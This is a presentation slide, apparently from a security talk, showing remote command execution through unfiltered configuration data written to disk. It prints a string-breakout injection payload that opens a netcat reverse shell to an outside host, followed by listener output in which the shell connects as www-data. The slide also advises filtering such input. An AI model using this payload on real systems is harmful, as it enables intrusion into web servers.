Slide 38
Slide 38 text
Remote Command Execution
If writing configuration information to disk, at least attempt to filter it.
Payload: “; exec(‘nc {ip} {port} -e /bin/bash’); //
Saved, the page refreshed and…
Of course there’s many other things you can do from this
Listening on [0.0.0.0] (family 0, port 1123)
Connection from {removed} 53704 received!
whoami
www-data